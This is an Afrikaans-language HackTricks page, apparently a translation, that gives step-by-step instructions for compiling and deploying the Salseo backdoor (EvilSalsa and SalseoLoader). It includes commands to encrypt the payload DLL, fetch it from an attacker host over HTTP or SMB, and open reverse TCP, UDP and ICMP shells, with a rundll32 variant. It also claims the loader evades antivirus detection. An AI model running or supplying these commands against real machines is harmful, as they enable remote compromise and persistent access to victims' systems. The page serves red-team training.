Salseo

Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Kompilering van die binêre lêers

Laai die bronkode af van die github en kompileer EvilSalsa en SalseoLoader. Jy sal Visual Studio geïnstalleer moet hê om die kode te kompileer.

Kompileer daardie projekte vir die argitektuur van die Windows-boks waar jy hulle gaan gebruik (As die Windows x64 ondersteun, kompileer hulle vir daardie argitekture).

Jy kan die argitektuur kies binne Visual Studio in die linker "Build" Tab in "Platform Target".

(**As jy hierdie opsies nie kan vind nie, druk op "Project Tab" en dan op "<Project Name> Properties")

Bou dan beide projekte (Build -> Build Solution) (Binne die logs sal die pad van die uitvoerbare lêer verskyn):

Berei die Agterdeur voor

Eerstens, sal jy die EvilSalsa.dll moet enkodeer. Om dit te doen, kan jy die python skrip encrypterassembly.py gebruik of jy kan die projek EncrypterAssembly kompileer:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

Ok, nou het jy alles wat jy nodig het om al die Salseo-ding uit te voer: die gekodeerde EvilDalsa.dll en die binêre van SalseoLoader.

Laai die SalseoLoader.exe binêre na die masjien op. Dit behoort nie deur enige AV opgespoor te word nie...

Voer die agterdeur uit

Kry 'n TCP-omgekeerde dop (laai die gekodeerde dll af deur HTTP)

Onthou om 'n nc as die omgekeerde dopluisteraar te begin en 'n HTTP-bediener om die gekodeerde evilsalsa te dien.

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Kry 'n UDP omgekeerde dop (afgelaaide gekodeerde dll deur SMB)

Onthou om 'n nc te begin as die omgekeerde dop luisteraar, en 'n SMB-bediener om die gekodeerde evilsalsa te dien (impacket-smbserver).

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

Kry 'n ICMP omgekeerde dop (gekodeerde dll reeds binne die slagoffer)

Hierdie keer het jy 'n spesiale instrument in die klient nodig om die omgekeerde dop te ontvang. Laai af: https://github.com/inquisb/icmpsh

Deaktiveer ICMP Antwoorde:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

Voer die kliënt uit:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

Binne die slagoffer, laat ons die salseo ding uitvoer:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

Kompilering van SalseoLoader as DLL wat die hooffunksie uitvoer

Maak die SalseoLoader projek oop met behulp van Visual Studio.

Voeg voor die hooffunksie by: [DllExport]

Installeer DllExport vir hierdie projek

Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...

Soek na DllExport-pakket (deur die Browse-tab te gebruik), en druk op Installeer (en aanvaar die popup)

In jou projekmap het die lêers verskyn: DllExport.bat en DllExport_Configure.bat

Deïnstalleer DllExport

Druk Deïnstalleer (ja, dit is vreemd, maar glo my, dit is nodig)

Sluit Visual Studio af en voer DllExport_configure uit

Net sluit Visual Studio af

Gaan dan na jou SalseoLoader-map en voer DllExport_Configure.bat uit

Kies x64 (as jy dit binne 'n x64-boks gaan gebruik, dit was my geval), kies System.Runtime.InteropServices (binne Namespace vir DllExport) en druk Toepas

Maak die projek weer oop met Visual Studio

[DllExport] behoort nie meer as fout gemerk te wees nie

Bou die oplossing

Kies Uitvoertipe = Klasbiblioteek (Projek --> SalseoLoader Eienskappe --> Toepassing --> Uitvoertipe = Klasbiblioteek)

Kies x64 platform (Projek --> SalseoLoader Eienskappe --> Bou --> Platform teiken = x64)

Om die oplossing te bou: Bou --> Bou Oplossing (Binne die Uitvoerkonsole sal die pad van die nuwe DLL verskyn)

Toets die gegenereerde Dll

Kopieer en plak die Dll waar jy dit wil toets.

Voer uit:

rundll32.exe SalseoLoader.dll,main

Indien geen fout verskyn nie, het jy waarskynlik 'n funksionele DLL!!

Kry 'n skaal deur die DLL te gebruik

Moenie vergeet om 'n HTTP bediener te gebruik en 'n nc luisteraar in te stel

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated